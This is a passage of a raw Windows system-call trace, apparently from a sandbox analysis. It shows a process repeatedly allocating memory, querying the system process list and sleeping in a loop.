returned 0x0 [0240.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.996] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.002] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.026] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.061] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.075] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.083] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.097] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.110] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.116] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.123] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.129] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.135] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 